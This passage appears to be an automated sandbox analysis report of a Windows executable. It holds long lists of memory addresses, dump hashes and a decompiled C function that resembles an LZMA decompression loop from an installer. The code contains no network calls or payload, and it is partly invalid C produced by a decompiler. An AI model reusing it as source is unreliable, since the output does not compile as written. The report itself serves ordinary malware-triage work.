                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x0040681f
                                                                                                        0x00406819
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00406819
                                                                                                        0x004067a0
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x004064f2

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                        • Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
                                                                                                        • Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                        • Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E0040643A() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
